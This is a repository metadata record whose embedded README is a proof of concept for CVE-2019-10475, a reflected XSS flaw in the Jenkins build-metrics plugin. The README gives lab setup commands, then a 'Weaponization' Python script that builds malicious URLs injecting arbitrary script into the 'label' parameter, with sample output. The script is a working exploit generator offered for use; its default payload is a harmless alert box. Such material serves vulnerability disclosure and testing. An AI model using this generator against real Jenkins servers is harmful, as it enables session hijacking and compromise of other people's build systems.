{"id":18410599,"url":"https://github.com/vesche/cve-2019-10475","last_synced_at":"2025-04-07T10:32:24.838Z","repository":{"id":85570713,"uuid":"220101094","full_name":"vesche/CVE-2019-10475","owner":"vesche","description":null,"archived":false,"fork":false,"pushed_at":"2022-01-26T17:08:27.000Z","size":502,"stargazers_count":13,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-22T16:52:50.741Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vesche.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-11-06T22:19:01.000Z","updated_at":"2024-08-12T19:54:37.000Z","dependencies_parsed_at":"2023-05-17T06:45:55.309Z","dependency_job_id":null,"html_url":"https://github.com/vesche/CVE-2019-10475","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vesche%2FCVE-2019-10475/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vesche","download_url":"https://codeload.github.com/vesche/CVE-2019-10475/tar.gz/refs/heads/master","host":{"name":"GitHub","
url":"https://github.com","kind":"github","repositories_count":247637178,"owners_count":20971082,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T03:33:01.190Z","updated_at":"2025-04-07T10:32:24.797Z","avatar_url":"https://github.com/vesche.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2019-10475\n\nQuick POC for Jenkins [CVE-2019-10475](https://nvd.nist.gov/vuln/detail/CVE-2019-10475) / [SECURITY-1490](https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490) reported on 2019-10-23. The issue is within the [build-metrics](https://plugins.jenkins.io/build-metrics) plugin which generates some basic build metrics. It's commonly used with the Jenkins sidebar links plugin.\n\nThis is a simple \u0026 generic reflected XSS vulnerability. 
The issue is that the plugin does not properly escape the `label` query parameter.\n\n![0](scrots/0.png)\n\n## Setup\n\nPOC was done on Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3.\n\n```bash\n# install jenkins\nsudo apt-get install daemon psmisc net-tools openjdk-11-jre\nwget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -\nwget https://pkg.jenkins.io/debian/binary/jenkins_2.203_all.deb\nsudo dpkg -i jenkins_2.203_all.deb\nsudo systemctl status jenkins\n# activate using admin password\nsudo cat /var/lib/jenkins/secrets/initialAdminPassword\n# get jenkins cli\nwget http://localhost:8080/jnlpJars/jenkins-cli.jar\n# install plugins\njava -jar ./jenkins-cli.jar -s \"http://localhost:8080\" -auth admin:password -noKeyAuth install-plugin global-build-stats -restart\njava -jar ./jenkins-cli.jar -s \"http://localhost:8080\" -auth admin:password -noKeyAuth install-plugin build-metrics -restart\n```\n\n## Exploit POC\n\nThe vulnerable plugin can be found at `http://localhost:8080/plugin/build-metrics/`; the vulnerable parameter is `label`. 
We can inject a simple script like so:\n\n![1](scrots/1.png)\n\n## Weaponization\n\nSee `CVE-2019-10475.py`, it can be used to build malicious payloads:\n\n```python\n#!/usr/bin/env python\n\nimport sys\nimport argparse\n\nVULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}\u0026range=2\u0026rangeUnits=Weeks\u0026jobFilteringType=ALL\u0026jobFilter=\u0026nodeFilteringType=ALL\u0026nodeFilter=\u0026launcherFilteringType=ALL\u0026launcherFilter=\u0026causeFilteringType=ALL\u0026causeFilter=\u0026Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96\u0026json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D\u0026Submit=Search'''\n\n\ndef get_parser():\n    parser = argparse.ArgumentParser(description='CVE-2019-10475')\n    parser.add_argument('-p', '--port', help='port', default=80, type=int)\n    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)\n    parser.add_argument('-i', '--inject', help='inject', default='\u003cscript\u003ealert(\"CVE-2019-10475\")\u003c/script\u003e', type=str)\n    return parser\n\n\ndef main():\n    parser = get_parser()\n    args = vars(parser.parse_args())\n    port = args['port']\n    domain = args['domain']\n    inject = args['inject']\n    if port == 80:\n        base_url = f'http://{domain}'\n    elif port == 443:\n        base_url = f'https://{domain}'\n    else:\n        base_url = 
f'http://{domain}:{port}'\n    build_url = VULN_URL.format(base_url=base_url, inject=inject)\n    print(build_url)\n    return 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n```\n\nUsage:\n```\n$ python3 CVE-2019-10475.py --help\nusage: CVE-2019-10475.py [-h] [-p PORT] [-d DOMAIN] [-i INJECT]\n\nCVE-2019-10475\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -p PORT, --port PORT  port\n  -d DOMAIN, --domain DOMAIN\n                        domain\n  -i INJECT, --inject INJECT\n                        inject\n\n$ python3 CVE-2019-10475.py -p 8080 -d 192.168.1.75\nhttp://192.168.1.75:8080/plugin/build-metrics/getBuildStats?label=\u003cscript\u003ealert(\"CVE-2019-10475\")\u003c/script\u003e\u0026range=2\u0026rangeUnits=Weeks\u0026jobFilteringType=ALL\u0026jobFilter=\u0026nodeFilteringType=ALL\u0026nodeFilter=\u0026launcherFilteringType=ALL\u0026launcherFilter=\u0026causeFilteringType=ALL\u0026causeFilter=\u0026Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96\u0026json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D\u0026Submit=Search\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvesche%2Fcve-2019-10475","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvesche%2Fcve-2019-10475","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvesche%2Fcve-2019-10475/lists"}